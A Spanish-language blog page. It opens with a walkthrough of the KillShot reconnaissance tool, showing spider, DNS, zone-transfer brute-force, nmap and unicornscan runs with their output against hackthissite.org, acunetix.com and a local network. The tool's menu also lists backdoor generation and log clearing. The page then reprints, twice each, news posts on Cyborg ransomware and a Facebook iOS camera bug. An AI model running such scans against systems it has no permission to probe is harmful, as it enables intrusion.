 ██║ ██╔╝██║██║     ██║         ██╔════╝██║  ██║██╔═══██╗╚══██╔══╝
 █████╔╝ ██║██║     ██║         ███████╗███████║██║   ██║   ██║
 ██╔═██╗ ██║██║     ██║         ╚════██║██╔══██║██║   ██║   ██║
 ██║  ██╗██║███████╗███████╗    ███████║██║  ██║╚██████╔╝   ██║
 ╚═╝  ╚═╝╚═╝╚══════╝╚══════╝    ╚══════╝╚═╝  ╚═╝ ╚═════╝    ╚═╝
                                <Track my Target>       Gather information                                                            About Targets
 track>>> : help
 [site] MAKE YOUR TARGET
 [help] show this MESSAGE
 [targ] Search targets
 [exit] exit the script
 [uptd] Update KillShot
 [anon] Run Anonymous Mode
 [info] About killShot
 track>>> :
  • Luego ingrese el sitio web que desea escanear. Estamos usando www.hackthissite.org
  • Escriba www.hackthissite.org y pulse enter

       .n                   .                 .                  n.
  .   .dP                  dP                   9b                 9b.    .
 4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP
 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
  `9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
    `9XXXXXXXXXXXP' `9XX'   Hide    `98v8P'  Hack   `XXP' `9XXXXXXXXXXXP'
        ~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
                        )b.  .dbo.dP'`v'`9b.odb.  .dX
{0} Spider
 {1} Web technologie
 {2} WebApp Vul Scanner
 {3} Port Scanner
 {4} CMS Scanner
 {5} Fuzzers
 {6} Cms Exploit Scanner
 {7} Backdoor Generation
 {8} Linux Log Clear
 {9} Find MX/NS
 info>>> :
  • Ahora mostrará múltiples opciones, puedes usar cualquiera de ellas
  • Aquí estamos utilizando 0 spider
info>>> : 0
  ip For www.hackthissite.org :: "137.74.187.104"
 Links And Paths  ::
 Related domains and Parameters ::
 https://www.hackthissite.org
 irc://irc.hackthissite.org:+7000/
 https://www.hackthissite.org/forums
 https://www.cafepress.com/htsstore
 https://hts.io
 https://twitter.com/hackthissite
 /
 https://www.hackthissite.org/TNG355Q5B85cL3PDeI88H0dLCRYaA776flCTc4MX0u136lQ4hP94cZSnOFheqEU9zT8k6WDlcG17HglFDUi0Tg7kH42bzckCR4Q2ZQ
 https://www.hackthissite.org/advertise/
 /user/login
 /register
 /user/resetpass
 https://www.hackthissite.org/donate/
 /missions/basic/
 /missions/realistic/
 /missions/application/
 /missions/programming/
 /missions/phonephreaking/
 /missions/javascript/
 /missions/forensic/
 /missions/playit/extbasic/0/
 /missions/playit/stego/0/
 irc://irc.hackthissite.org/htb
 /blogs
 /news
 /pages/articles/article.php
 /lectures
 /pages/programs/programs.php
 http://mirror.hackthissite.org/hackthiszine/
  • Esta salida mostrará las páginas rastreadas del dominio objetivo. También mostró el inicio de sesión del usuario y el registro de las páginas del objetivo
  • Y luego estamos usando la opción (1) web technologie, esta opción escaneará el sitio web utilizando WhatWeb Information, Dig y también intentará la transferencia de zona y la fuerza bruta, el resultado de la ruta de rastreo y la detección de cortafuegos e IDS
info>>> : 1
  [+]Basic WhatWeb Information  ::
  terminated with exception (report_on_exception is true):
 Traceback (most recent call last):
         2542: from /usr/bin/whatweb:981:in block (2 levels) in <main>'         2541: from /usr/bin/whatweb:981:inloop'
         2540: from /usr/bin/whatweb:988:in block (3 levels) in <main>'         2539: from /usr/share/whatweb/lib/target.rb:96:inopen'
         2538: from /usr/share/whatweb/lib/target.rb:188:in open_url'         2537: from /usr/lib/ruby/2.5.0/net/http.rb:1455:inrequest'
         2536: from /usr/lib/ruby/2.5.0/net/http.rb:909:in start'         2535: from /usr/lib/ruby/2.5.0/net/http.rb:920:indo_start'
          … 2530 levels…
            4: from /usr/lib/ruby/2.5.0/resolv.rb:524:in block in fetch_resource'            3: from /usr/lib/ruby/2.5.0/resolv.rb:769:insender'
            2: from /usr/lib/ruby/2.5.0/resolv.rb:629:in allocate_request_id'            1: from /usr/lib/ruby/2.5.0/resolv.rb:629:insynchronize'
 /usr/lib/ruby/2.5.0/resolv.rb:630:in block in allocate_request_id': stack level too deep (SystemStackError) Traceback (most recent call last):         2542: from /usr/bin/whatweb:981:inblock (2 levels) in 
'
.-------------------------SNIP---------------------------------------------
         2541: from /usr/bin/whatweb:981:in loop'         2540: from /usr/bin/whatweb:988:inblock (3 levels) in '
         2539: from /usr/share/whatweb/lib/target.rb:96:in open'         2538: from /usr/share/whatweb/lib/target.rb:188:inopen_url'
         2537: from /usr/lib/ruby/2.5.0/net/http.rb:1455:in request'         2536: from /usr/lib/ruby/2.5.0/net/http.rb:909:instart'
         2535: from /usr/lib/ruby/2.5.0/net/http.rb:920:in do_start'          ... 2530 levels...            4: from /usr/lib/ruby/2.5.0/resolv.rb:524:inblock in fetch_resource'
            3: from /usr/lib/ruby/2.5.0/resolv.rb:769:in sender'            2: from /usr/lib/ruby/2.5.0/resolv.rb:629:inallocate_request_id'
            1: from /usr/lib/ruby/2.5.0/resolv.rb:629:in synchronize' /usr/lib/ruby/2.5.0/resolv.rb:630:inblock in allocate_request_id': stack level too deep (SystemStackError)
  [+]Host Result ::
 www.hackthissite.org has address 137.74.187.100
 www.hackthissite.org has address 137.74.187.103
 www.hackthissite.org has address 137.74.187.104
 www.hackthissite.org has address 137.74.187.102
 www.hackthissite.org has address 137.74.187.101
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:102
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:103
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:101
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:104
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:100
  [+]Dig Result About Dns::
 ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7021 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1 ;8.8.8.8.                       IN      A ;; AUTHORITY SECTION: .                       6767    IN      SOA     a.root-servers.net. nstld.verisign-grs.com. 2019050800 1800 900 604800 86400 ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5506
 ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 0
 ;www.hackthissite.org.          IN      A
 ;; ANSWER SECTION:
 www.hackthissite.org.   2440    IN      A       137.74.187.100
 www.hackthissite.org.   2440    IN      A       137.74.187.103
 www.hackthissite.org.   2440    IN      A       137.74.187.104
 www.hackthissite.org.   2440    IN      A       137.74.187.102
 www.hackthissite.org.   2440    IN      A       137.74.187.101
  [+]Trying zone transfer and Brute force ::
 Option w is ambiguous (wide, wordlist)
 Trying zone transfer first…
 Unsuccessful in zone transfer (it was worth a shot)
 Okay, trying the good old fashioned way… brute force
 Checking for wildcard DNS…
 Nope. Good.
 Now performing 2280 test(s)…
 Subnets found (may want to probe here using nmap or unicornscan):
 Done with Fierce scan: http://ha.ckers.org/fierce/
 Found 0 entries.
 Have a nice day.
  • Esta salida mostrará la información básica de un sitio web. Su escaneo detectó aplicaciones, servidores web y otras tecnologías. También escanea los encabezados HTTP del servidor web y el origen HTML de un destino.
  • Resultado del host: muestra la dirección IP del host del sitio web y también analiza IPv4 o IPv6 de un sitio web.
  • También escanea el Firewall y el IDS en el destino (No se detectó WAF por la detección genérica) significa NO WAF (Firewall de aplicación web).La herramienta Dig se usa para consultar servidores de nombres DNS, para obtener información como direcciones de host, servidor de correo, servidores de nombres e información relacionada. También se encuentran los registros A del objetivo
NOTA: PARA OBTENER TODAS LAS OPCIONES NO NECESITA DESPLAZARSE, SÓLO ESCRIBA BANNER Y SE MOSTRARÁN TODAS LAS OPCIONES
  • Y ahora usaremos la opción {3} Port Scanner, este escaneará puertos de destino completos utilizando dos herramientas: nmap y unicorn scan
Escaneo con Nmap
  • Elija cualquiera de ellos
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>0
  • Escriba 0
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>0
 [2] Nmap Os Scan
 [3] Nmap TCP Scan
 [4] Nmap UDB Scan
 [5] Nmap All scan
 [6] Nmap Http Option Scan
 [7] Nmap Live target In Network
 Scanner >>
  • Mostrará todas las opciones de Nmap
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>0
 [2] Nmap Os Scan
 [3] Nmap TCP Scan
 [4] Nmap UDB Scan
 [5] Nmap All scan
 [6] Nmap Http Option Scan
 [7] Nmap Live target In Network
 Scanner >>5
 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-09 05:59 EDT
 Nmap scan report for www.acunetix.com (54.208.84.166)
 Host is up (0.24s latency).
 rDNS record for 54.208.84.166: ec2-54-208-84-166.compute-1.amazonaws.com
 Not shown: 998 filtered ports
 PORT    STATE SERVICE  VERSION
 80/tcp  open  http     nginx
 |http-server-header: acunetix.com |_http-title: Did not follow redirect to https://acunetix.com/ 443/tcp open  ssl/http nginx | http-robots.txt: 3 disallowed entries |/dontVisitMe/ /blog/worldsecuritynews/* /
 |_http-server-header: acunetix.com
 |_http-title: 400 The plain HTTP request was sent to HTTPS port
 | ssl-cert: Subject: commonName=.acunetix.com/organizationName=Acunetix Ltd/stateOrProvinceName=ST. JULIANS/countryName=MT | Subject Alternative Name: DNS:.acunetix.com, DNS:acunetix.com
 | Not valid before: 2018-10-24T00:00:00
 |_Not valid after:  2020-11-18T12:00:00
 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 Device type: media device|specialized|general purpose
 Running: Crestron embedded, Wago Kontakttechnik embedded, Linux 2.4.X
 OS CPE: cpe:/h:crestron:mpc-m5 cpe:/h:wago_kontakttechnik:750-852 cpe:/o:linux:linux_kernel:2.4.26
 OS details: Crestron MPC-M5 AV controller or Wago Kontakttechnik 750-852 PLC, Linux 2.4.26 (Slackware 10.0.0)
 TRACEROUTE (using port 80/tcp)
 HOP RTT     ADDRESS
 1   …
 2   4.06 ms 115.97.136.1
 3   … 30
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 58.15 seconds
  • Nmap TCP Scan muestra los puertos abiertos y cerrados de TCP. Este es uno de los temas más relevantes del curso de hacking ético del IICS
Escaneo de Unicorn
  • Ahora analizaremos la herramienta Unicorn. Debe seguir todos los pasos para obtener la opción de escaneo de puertos y luego seleccionar 1
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>1
 [8] Services OS
 [9] TCP SYN Scan on a whole network
 [01] UDP scan on the whole network
 Scanner >>
  • Se mostrarán los tipos de escaneados disponibles
  • Deje que seleccione [9] TCP SYN Scan en una red completa y le pedirá una dirección IP 192.168.1.1 del enrutador
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>1
 [8] Services OS
 [9] TCP SYN Scan on a whole network
 [01] UDP scan on the whole network
 Scanner >>9
 Your Router Ip : 192.168.1.1
  • Deje que el escaneo continúe
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>1
 [8] Services OS
 [9] TCP SYN Scan on a whole network
 [01] UDP scan on the whole network
 Scanner >>9
 Your Router Ip : 192.168.1.1
 adding 192.168.1.0/24 mode TCPscan' ports7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
 using interface(s) eth0
----------------------------------SNIP-------------------------------------
 scaning 2.56e+02 total hosts with 8.65e+04 total packets, should take a little longer than 4 Minutes, 55 Seconds
 connected 192.168.1.12:34682 -> 192.168.1.10:139
 TCP open 192.168.1.10:139  ttl 128
 connected 192.168.1.12:19928 -> 192.168.1.5:139
 TCP open 192.168.1.5:139  ttl 128
 connected 192.168.1.12:57128 -> 192.168.1.3:139
 TCP open 192.168.1.3:139  ttl 128
 connected 192.168.1.12:40890 -> 192.168.1.4:139
 TCP open 192.168.1.4:139  ttl 128
 connected 192.168.1.12:63984 -> 192.168.1.3:3389
 TCP open 192.168.1.3:3389  ttl 128
 connected 192.168.1.12:4474 -> 192.168.1.1:23
 TCP open 192.168.1.1:23  ttl 64
 connected 192.168.1.12:19804 -> 192.168.1.5:445
 TCP open 192.168.1.5:445  ttl 128
 connected 192.168.1.12:17218 -> 192.168.1.10:445
 TCP open 192.168.1.10:445  ttl 128
 connected 192.168.1.12:16075 -> 192.168.1.4:445
 TCP open 192.168.1.4:445  ttl 128
 connected 192.168.1.12:35635 -> 192.168.1.3:445
 TCP open 192.168.1.3:445  ttl 128
 connected 192.168.1.12:59512 -> 192.168.1.1:53
 TCP open 192.168.1.1:53  ttl 64
 connected 192.168.1.12:17273 -> 192.168.1.1:80
 TCP open 192.168.1.1:80  ttl 64
 connected 192.168.1.12:17994 -> 192.168.1.3:554
 TCP open 192.168.1.3:554  ttl 128
 connected 192.168.1.12:10098 -> 192.168.1.4:554
 TCP open 192.168.1.4:554  ttl 128
 connected 192.168.1.12:5254 -> 192.168.1.10:135
 TCP open 192.168.1.10:135  ttl 128
 connected 192.168.1.12:10011 -> 192.168.1.3:135
 TCP open 192.168.1.3:135  ttl 128
 connected 192.168.1.12:19956 -> 192.168.1.4:135
 TCP open 192.168.1.4:135  ttl 128
 connected 192.168.1.12:21180 -> 192.168.1.5:135
 TCP open 192.168.1.5:135  ttl 128
 connected 192.168.1.12:14926 -> 192.168.1.1:443
 TCP open 192.168.1.1:443  ttl 64
 connected 192.168.1.12:17101 -> 192.168.1.10:443
 TCP open 192.168.1.10:443  ttl 128
 connected 192.168.1.12:6074 -> 192.168.1.3:443
 TCP open 192.168.1.3:443  ttl 128
 connected 192.168.1.12:51922 -> 192.168.1.4:443
 TCP open 192.168.1.4:443  ttl 128
 connected 192.168.1.12:13164 -> 192.168.1.6:22
 TCP open 192.168.1.6:22  ttl 64
 sender statistics 177.8 pps with 86528 packets sent total
 listener statistics 2894 packets recieved 0 packets droped and 0 interface drops
 TCP open                  telnet[   23]         from 192.168.1.1  ttl 64
 TCP open                  domain[   53]         from 192.168.1.1  ttl 64
 TCP open                    http[   80]         from 192.168.1.1  ttl 64
 TCP open                   https[  443]         from 192.168.1.1  ttl 64
 TCP open                   epmap[  135]         from 192.168.1.3  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.3  ttl 128
 TCP open                   https[  443]         from 192.168.1.3  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.3  ttl 128
 TCP open                    rtsp[  554]         from 192.168.1.3  ttl 128
 TCP open           ms-wbt-server[ 3389]         from 192.168.1.3  ttl 128
 TCP open                   epmap[  135]         from 192.168.1.4  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.4  ttl 128
 TCP open                   https[  443]         from 192.168.1.4  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.4  ttl 128
 TCP open                    rtsp[  554]         from 192.168.1.4  ttl 128
 TCP open                   epmap[  135]         from 192.168.1.5  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.5  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.5  ttl 128
 TCP open                     ssh[   22]         from 192.168.1.6  ttl 64
 TCP open                   epmap[  135]         from 192.168.1.10  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.10  ttl 128
 TCP open                   https[  443]         from 192.168.1.10  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.10  ttl 128
  • Se escanearán todos los puertos TCP abiertos en el objetivo
connected 192.168.1.12:34682 -> 192.168.1.10:139
 TCP open 192.168.1.10:139  ttl 128
  • También escanean los puertos TCP abiertos y muestra los servicios con puertos
  • Estadísticas del remitente 177.8 pps con 86528 paquetes enviados en total
  • Para escanear utiliza su tarjeta de red local como se muestra a continuación
using interface(s) eth0

viernes, 22 de noviembre de 2019


Cuidado con las actualizaciones fake de Windows, pueden infectar tu PC

El ransomware continúa siendo una amenaza en España, estos son los 5 más peligrosos
Se ha descubierto una actualización falsa para Windows 10 que puede infectar tu ordenador con ransomware cifrando todos tus archivos para que no puedas volver a utilizar el equipo.
Uno de los ataques más peligrosos que podremos sufrir en nuestro ordenador es el llamado ransomware, que es cuando se cifran todos nuestros archivos y no podemos acceder a los mismos al no ser que paguemos una recompensa. Este tipo de vulnerabilidades que se encuentran bastante común en Internet suelen estar dirigidas a empresas, aunque de momento siguen teniendo como objetivo a los usuarios.
La firma de seguridad Trustwave ha descubierto una nueva campaña de ransomware que se basa en el miedo y advertencias falsas sobre una infección en tu sistema operativo. Estos avisos que meten miedo al usuario son enviados al correo electrónico de la víctima donde se incluye adjuntada la amenaza. En este correo se insta al usuario a que ejecute una actualización falsa y que viene mediante una extensión JPG, pero que en realidad esconde el ransomware cyborg.
Ransomware Cyborg
Una vez que el ransomware infecta nuestro ordenador, los archivos se cifran y cambian a la extensión “777”. Desde ese momento los archivos del usuario están totalmente bloqueados, y sólo tienes acceso a un documento de texto en el escritorio donde se te proporcionan instrucciones para volver a contar con acceso a los archivos.
En dicho documento de texto se pide al usuario que envíe 500 $ a una billetera de Bitcoin para que se desbloqueen sus archivos, en un procedimiento en el que caen muy pocas personas. Si pagas los 500 $ de recompensa, no solo vas a perder el dinero, sino también tus archivos  dado que jamás recibirás la clave para que vuelvas a tener acceso a los mismos.
Si estás infectado por el ransomware no podrás hacer absolutamente nada y la mejor solución es formatear el equipo. Es por ello que siempre es bueno contar con copias de seguridad de nuestro ordenador, o al menos guardar todos los archivos o documentos importantes en un disco duro externo.
Es totalmente aconsejable que jamás abras un archivo adjunto que te venga desde un correo electrónico desconocido. No obstante, ninguna compañía de este calibre se pondrá en contacto contigo a través del correo, con lo que debes evitar abrir este tipo de mensajes.

Cuidado con las actualizaciones fake de Windows, pueden infectar tu PC


Cuidado con las actualizaciones fake de Windows, pueden infectar tu PC

El ransomware continúa siendo una amenaza en España, estos son los 5 más peligrosos
Se ha descubierto una actualización falsa para Windows 10 que puede infectar tu ordenador con ransomware cifrando todos tus archivos para que no puedas volver a utilizar el equipo.
Uno de los ataques más peligrosos que podremos sufrir en nuestro ordenador es el llamado ransomware, que es cuando se cifran todos nuestros archivos y no podemos acceder a los mismos al no ser que paguemos una recompensa. Este tipo de vulnerabilidades que se encuentran bastante común en Internet suelen estar dirigidas a empresas, aunque de momento siguen teniendo como objetivo a los usuarios.
La firma de seguridad Trustwave ha descubierto una nueva campaña de ransomware que se basa en el miedo y advertencias falsas sobre una infección en tu sistema operativo. Estos avisos que meten miedo al usuario son enviados al correo electrónico de la víctima donde se incluye adjuntada la amenaza. En este correo se insta al usuario a que ejecute una actualización falsa y que viene mediante una extensión JPG, pero que en realidad esconde el ransomware cyborg.
Ransomware Cyborg
Una vez que el ransomware infecta nuestro ordenador, los archivos se cifran y cambian a la extensión “777”. Desde ese momento los archivos del usuario están totalmente bloqueados, y sólo tienes acceso a un documento de texto en el escritorio donde se te proporcionan instrucciones para volver a contar con acceso a los archivos.
En dicho documento de texto se pide al usuario que envíe 500 $ a una billetera de Bitcoin para que se desbloqueen sus archivos, en un procedimiento en el que caen muy pocas personas. Si pagas los 500 $ de recompensa, no solo vas a perder el dinero, sino también tus archivos  dado que jamás recibirás la clave para que vuelvas a tener acceso a los mismos.
Si estás infectado por el ransomware no podrás hacer absolutamente nada y la mejor solución es formatear el equipo. Es por ello que siempre es bueno contar con copias de seguridad de nuestro ordenador, o al menos guardar todos los archivos o documentos importantes en un disco duro externo.
Es totalmente aconsejable que jamás abras un archivo adjunto que te venga desde un correo electrónico desconocido. No obstante, ninguna compañía de este calibre se pondrá en contacto contigo a través del correo, con lo que debes evitar abrir este tipo de mensajes.

jueves, 14 de noviembre de 2019

[Actualizado] Facebook para iOS accede a la cámara de algunos usuarios sin que lo sepan, pero probablemente se trata de un bug

[Actualizado] Facebook para iOS accede a la cámara de algunos usuarios sin que lo sepan, pero probablemente se trata de un bug

Facebook se ha puesto en contacto con nostros con el siguiente mensaje, confirmando que se trataba de un bug que ya han solucionado: "Recientemente descubrimos que la versión 244 de la aplicación de Facebook iOS se iniciaba incorrectamente en modo horizontal. Al arreglar ese problema la semana pasada en la versión 246 (lanzada el 8 de noviembre), sin darnos cuenta introdujimos un error que causó que la aplicación navegara parcialmente a la pantalla de la cámara adyacente a News Feed cuando los usuarios tocaban las fotos. No hemos visto ninguna evidencia de que se hayan subido fotos o vídeos debido a este error. Enviaremos el parche a Apple hoy".
Facebook es una de las firmas que más suspicacias despiertan entre los usuarios cuando hay que hablar de privacidad. Es algo que puede ser bastante lógico si atendemos a los antecedentes recientes de la plataforma, repetidos una y otra vez, y por eso noticias como esta siempre llaman la atención.
Según leemos en The Next Web, la aplicación por medio de la cual accedemos a la famosa red social, podría estar dando acceso a la cámara de los teléfonos iPhone sin que el usuario tuviera conocimiento de que algo así está sucediendo.

Cámara en segundo plano

Facebook
Hay que tomar la noticia con cuidado, puesto que se trata de información surgida a causa de lo que ha experimentado un usuario, Joshua Maddux, que ha manifestado en Twitter que su teléfono, un iPhone, muestra un comportamiento anormal cuando hace uso de la app de Facebook que se puede encontrar en la App Store.
Según este usuario, la aplicación de Facebook ofrece acceso a la cámara del iPhone mientras se desplaza por su muro de noticias. Se puede apreciar en el vídeo como en el margen izquierdo de la pantalla se ve la grabación efectuada por la cámara.
En el tweet que ha publicado, se puede apreciar cómo al mover una foto presente en el timeline de Facebook, en segundo plano se muestra a toda pantalla la grabación que está efectuando la cámara trasera de su smartphone.
Maddux afirma que ha logrado reproducir el mismo bug en hasta cinco dispositivos, todos iPhone, los cuales contaban con la versión de firmware más reciente (a excepción de la beta). Todos hacían uso de iOS 13.2.2, mientras que los modelos que ejecutan iOS 12 no muestran este fallo.

Facebook tras el escándalo: así ha cambiado la empresa un año después del desastre de Cambridge Analytica
No es el único caso en el que usuarios de Facebook muestran su descontento con la app de iOS y este fallo. Es el caso de Daryl Lasafin que en Twitter muestra el mismo fallo. La cámara trabajando de fondo y de nuevo con iOS 13.2.2.
En todos los casos en los que se da esta situación, la app de Facebook para iOS cuenta con acceso a la cámara, algo que me hizo probar la app en un iPhone para ver si conseguía reproducir el fallo.
Facebook Ios
He usado un iPhone 11 Pro con iOS 13.3 (es la beta) y me cerciorado de que Facebook cuenta con acceso a la función cámara y en ningún momento he notado que bajo la app, la cámara trasera esté funcionando en segundo plano.
No está claro qué es lo que motiva el error, si se trata de un fallo o bug, por lo que esperamos alguna información oficial por parte de Facebook pronunciándose sobre este hecho. Si es un fallo, debería corregirse con la siguiente actualización de la aplicación en iOS.

[Actualizado] Facebook para iOS accede a la cámara de algunos usuarios sin que lo sepan, pero probablemente se trata de un bug

[Actualizado] Facebook para iOS accede a la cámara de algunos usuarios sin que lo sepan, pero probablemente se trata de un bug

[Actualizado] Facebook para iOS accede a la cámara de algunos usuarios sin que lo sepan, pero probablemente se trata de un bug

Facebook se ha puesto en contacto con nostros con el siguiente mensaje, confirmando que se trataba de un bug que ya han solucionado: "Recientemente descubrimos que la versión 244 de la aplicación de Facebook iOS se iniciaba incorrectamente en modo horizontal. Al arreglar ese problema la semana pasada en la versión 246 (lanzada el 8 de noviembre), sin darnos cuenta introdujimos un error que causó que la aplicación navegara parcialmente a la pantalla de la cámara adyacente a News Feed cuando los usuarios tocaban las fotos. No hemos visto ninguna evidencia de que se hayan subido fotos o vídeos debido a este error. Enviaremos el parche a Apple hoy".
Facebook es una de las firmas que más suspicacias despiertan entre los usuarios cuando hay que hablar de privacidad. Es algo que puede ser bastante lógico si atendemos a los antecedentes recientes de la plataforma, repetidos una y otra vez, y por eso noticias como esta siempre llaman la atención.
Según leemos en The Next Web, la aplicación por medio de la cual accedemos a la famosa red social, podría estar dando acceso a la cámara de los teléfonos iPhone sin que el usuario tuviera conocimiento de que algo así está sucediendo.

Cámara en segundo plano

Facebook
Hay que tomar la noticia con cuidado, puesto que se trata de información surgida a causa de lo que ha experimentado un usuario, Joshua Maddux, que ha manifestado en Twitter que su teléfono, un iPhone, muestra un comportamiento anormal cuando hace uso de la app de Facebook que se puede encontrar en la App Store.
Según este usuario, la aplicación de Facebook ofrece acceso a la cámara del iPhone mientras se desplaza por su muro de noticias. Se puede apreciar en el vídeo como en el margen izquierdo de la pantalla se ve la grabación efectuada por la cámara.
En el tweet que ha publicado, se puede apreciar cómo al mover una foto presente en el timeline de Facebook, en segundo plano se muestra a toda pantalla la grabación que está efectuando la cámara trasera de su smartphone.
Maddux afirma que ha logrado reproducir el mismo bug en hasta cinco dispositivos, todos iPhone, los cuales contaban con la versión de firmware más reciente (a excepción de la beta). Todos hacían uso de iOS 13.2.2, mientras que los modelos que ejecutan iOS 12 no muestran este fallo.

Facebook tras el escándalo: así ha cambiado la empresa un año después del desastre de Cambridge Analytica
No es el único caso en el que usuarios de Facebook muestran su descontento con la app de iOS y este fallo. Es el caso de Daryl Lasafin que en Twitter muestra el mismo fallo. La cámara trabajando de fondo y de nuevo con iOS 13.2.2.
En todos los casos en los que se da esta situación, la app de Facebook para iOS cuenta con acceso a la cámara, algo que me hizo probar la app en un iPhone para ver si conseguía reproducir el fallo.
Facebook Ios
He usado un iPhone 11 Pro con iOS 13.3 (es la beta) y me cerciorado de que Facebook cuenta con acceso a la función cámara y en ningún momento he notado que bajo la app, la cámara trasera esté funcionando en segundo plano.
No está claro qué es lo que motiva el error, si se trata de un fallo o bug, por lo que esperamos alguna información oficial por parte de Facebook pronunciándose sobre este hecho. Si es un fallo, debería corregirse con la siguiente actualización de la aplicación en iOS.